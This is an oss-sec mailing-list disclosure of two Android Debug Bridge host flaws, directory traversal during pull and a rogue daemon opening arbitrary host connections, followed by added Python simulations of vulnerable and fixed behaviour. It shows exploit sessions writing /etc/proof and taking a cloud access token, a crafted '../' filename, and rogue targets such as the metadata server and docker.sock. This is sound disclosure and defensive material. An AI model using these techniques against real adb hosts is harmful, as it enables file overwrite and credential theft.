oss-sec mailing list archives

android debug bridge (adb) reverse connection and directory traversal


From: Imre Rad <radimre83 () gmail com>
Date: Tue, 25 Oct 2022 15:52:53 +0200

Platform Tools v33.0.3
(https://developer.android.com/studio/releases/platform-tools)
released in August addresses two security issues in Android Debug
Bridge. Both require the adb host (e.g. the PC) to connect to a
compromised adb daemon (e.g. the mobile phone). This is a security
concern, for example, in automated environments or malware labs that run
arbitrary Android packages by design.
I found and reported these issues to Google last December.

CVE-2022-20128:
Adb was vulnerable to directory traversal attacks during the adb pull
operation. Example session (victim side):

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory

root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111

root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111  device

root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sdfsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)

root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world


PoC code: https://github.com/irsl/CVE-2022-20128 (also attached here)


CVE-2022-3168:
The reverse tunnel feature in Android Debug Bridge (adb) was
vulnerable as it allowed malicious adb daemons to open connections to
arbitrary host/ports and unix domain sockets on the host.

Example session; both sides running on Google Cloud virtual machines
for the sake of demonstration. The attacker receives the access token of
the service account the victim VM is running as.

Victim:

$ adb connect 10.128.0.5:5556
connected to 10.128.0.5:5556

Attacker side:

$ ./adb_rogue_daemon.py

...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type:
application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer:
Metadata Server for VM\r\nConnection: Close\r\nContent-Length:
1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options:
SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted]....................................................................................................................................................................................................................................................................................................................................................................................................

PoC code: https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards
(also attached here)


Regards,
Imre
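The following is an added illustration of the CVE-2022-20128 issue, not the PoC attached to the post and not adb's own code. It models the host side of `adb pull <dir>`: the daemon answers a LIST request with DENT records (id, mode, size, mtime, namelen, name, as documented in adb's SYNC.TXT), and the host joins each returned name onto the local destination. A rogue daemon can return a name such as `../../../../etc/proof`; the naive join lets it land outside the destination, which is what the session above shows. The hardened join treats a listing entry as a single path component and additionally checks that the resolved path stays under the destination. The constructed listing, the helper names and the exact checks are this example's assumptions; the post does not state how upstream fixed the bug.

```python
"""Host-side handling of `adb pull <dir>` against a rogue adbd (illustration).

Wire format follows adb's SYNC.TXT: a DENT record is the id 'DENT' plus four
little-endian uint32 fields (mode, size, mtime, namelen) followed by the name
bytes; the listing ends with a DONE record whose fields are zero.
"""
import os
import struct

DENT = b"DENT"
DONE = b"DONE"
_HDR = struct.Struct("<4sIIII")  # id, mode, size, mtime, namelen


def build_listing(entries):
    """Serialize what a daemon returns for LIST. entries: (name, mode, size, mtime)."""
    out = bytearray()
    for name, mode, size, mtime in entries:
        raw = name.encode()
        out += _HDR.pack(DENT, mode, size, mtime, len(raw)) + raw
    out += _HDR.pack(DONE, 0, 0, 0, 0)
    return bytes(out)


def parse_listing(data):
    """Yield (name, mode, size, mtime) for each DENT until DONE; reject truncation."""
    off = 0
    while True:
        if len(data) - off < _HDR.size:
            raise ValueError("truncated listing")
        ident, mode, size, mtime, namelen = _HDR.unpack_from(data, off)
        off += _HDR.size
        if ident == DONE:
            return
        if ident != DENT:
            raise ValueError("unexpected sync id %r" % ident)
        name = data[off:off + namelen]
        if len(name) != namelen:
            raise ValueError("truncated name")
        off += namelen
        yield name.decode(errors="surrogateescape"), mode, size, mtime


def local_path_unsafe(dest_dir, name):
    """Pre-fix behaviour: trust the daemon's name and join it as-is.
    '../' components walk out of dest_dir; an absolute name discards it entirely."""
    return os.path.join(dest_dir, name)


def local_path_safe(dest_dir, name):
    """Hardened join (this example's choice of checks): a directory entry must be a
    single component, and the resolved target must remain inside dest_dir."""
    if not name or name in (".", "..") or "/" in name or "\\" in name or "\0" in name:
        raise ValueError("refusing suspicious remote filename %r" % name)
    dest_real = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest_real, name))
    if os.path.commonpath([dest_real, target]) != dest_real:
        raise ValueError("entry %r escapes %s" % (name, dest_dir))
    return target


def rejects(dest_dir, name):
    """True if the hardened join refuses this remote name."""
    try:
        local_path_safe(dest_dir, name)
    except ValueError:
        return True
    return False


def simulate_pull(dest_dir, listing, path_fn):
    """Return the local path the host would write each listed entry to."""
    return [path_fn(dest_dir, name) for name, _, _, _ in parse_listing(listing)]


# Constructed rogue listing: one honest file plus a traversal entry.
ROGUE_LISTING = build_listing([
    ("1", 0o100644, 11, 0),
    ("../../../../etc/proof", 0o100644, 11, 0),
])

if __name__ == "__main__":
    dest = "/tmp/sdfsdf"
    print("pre-fix targets:", simulate_pull(dest, ROGUE_LISTING, local_path_unsafe))
    for name, _, _, _ in parse_listing(ROGUE_LISTING):
        print("%-25s -> %s" % (name, "rejected" if rejects(dest, name) else "accepted"))
```

The realpath/commonpath check is belt and braces: once separators and the dot entries are rejected, a single component cannot leave the directory, but the second check also catches a destination that is itself a symlink pointing elsewhere.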

Attachment: adbdirtrav.py
Attachment: adb_rogue_daemon.py
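The following is an added illustration of the CVE-2022-3168 issue, not the attached PoC and not adb's own code. It models the transport-level exchange: the host registers a reverse forward (`adb reverse tcp:8080 tcp:9090`), after which the daemon is expected to send A_OPEN packets naming the host-side target `tcp:9090`. A rogue daemon instead sends A_OPEN for a destination of its own choosing, such as the GCE metadata server whose response is shown in the session above; a host that dials whatever destination the daemon names is the vulnerable behaviour. The allowlist of configured reverse targets used here for the fixed behaviour is this example's assumption about the remedy; the post only states that the release addresses the issue. The packet header layout (six little-endian uint32 fields, magic = command XOR 0xffffffff) is adb's documented transport format; the destination spec strings are constructed for the example.

```python
"""Simulated adb transport exchange for CVE-2022-3168 (illustration).

A rogue adbd emits A_OPEN for an arbitrary host-side destination; the host
either dials it blindly (pre-fix) or refuses anything it did not configure as a
reverse forward (the remedy assumed here).
"""
import struct

A_OPEN = 0x4E45504F  # 'OPEN' as a little-endian uint32
A_OKAY = 0x59414B4F  # 'OKAY'
A_CLSE = 0x45534C43  # 'CLSE'
_MSG = struct.Struct("<IIIIII")  # command, arg0, arg1, data_length, data_check, magic


def pack_message(command, arg0, arg1, payload=b""):
    """Serialize a transport packet: 24-byte header then payload. data_check is the
    byte sum of the payload (legacy, unchecked by modern adb); magic is ~command."""
    return _MSG.pack(command, arg0, arg1, len(payload),
                     sum(payload) & 0xFFFFFFFF, command ^ 0xFFFFFFFF) + payload


def unpack_message(buf):
    """Parse a transport packet, verifying the magic and payload length."""
    command, arg0, arg1, length, _check, magic = _MSG.unpack_from(buf, 0)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("bad magic")
    payload = buf[_MSG.size:_MSG.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return command, arg0, arg1, payload


def rogue_open(remote_id, destination):
    """What a malicious daemon emits: OPEN naming a host-side destination of its choice."""
    return pack_message(A_OPEN, remote_id, 0, destination.encode() + b"\0")


class HostTransport:
    """Host (adb server) side state for one connected device."""

    def __init__(self, enforce_reverse_allowlist):
        self.enforce = enforce_reverse_allowlist
        self.reverse_targets = set()  # host-side specs the user asked to expose
        self.dialed = []              # destinations the host actually connected to

    def reverse(self, remote_spec, local_spec):
        """Equivalent of `adb reverse <remote> <local>`: remember the host-side
        target the daemon may legitimately OPEN back to."""
        self.reverse_targets.add(local_spec)

    def handle_packet(self, raw):
        """Process one packet from the daemon; return the host's reply packet."""
        command, remote_id, _, payload = unpack_message(raw)
        if command != A_OPEN:
            return None
        dest = payload.rstrip(b"\0").decode()
        if self.enforce and dest not in self.reverse_targets:
            # fixed behaviour assumed here: never dial a target the host did not configure
            return pack_message(A_CLSE, 0, remote_id)
        self.dialed.append(dest)  # pre-fix: connect wherever the daemon says
        return pack_message(A_OKAY, 1, remote_id)


# Constructed destinations a rogue daemon might name (spec syntax is an assumption).
METADATA = "tcp:169.254.169.254:80"               # GCE metadata server, as in the session
DOCKER_SOCK = "localfilesystem:/var/run/docker.sock"  # a unix domain socket on the host
LEGIT = "tcp:9090"                                 # the target the user actually exposed


def simulate(enforce):
    """Run the exchange and return the destinations the host ended up dialing."""
    host = HostTransport(enforce)
    host.reverse("tcp:8080", LEGIT)
    for i, dest in enumerate([METADATA, DOCKER_SOCK, LEGIT]):
        host.handle_packet(rogue_open(i + 1, dest))
    return host.dialed


if __name__ == "__main__":
    print("pre-fix host dialed:", simulate(False))
    print("fixed host dialed:  ", simulate(True))
```

The key point for defenders is that the host never needed any reverse forward to be configured: in the pre-fix path, an OPEN from the device is honoured regardless, so simply running `adb connect` against a hostile daemon exposes every socket the adb server process can reach.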

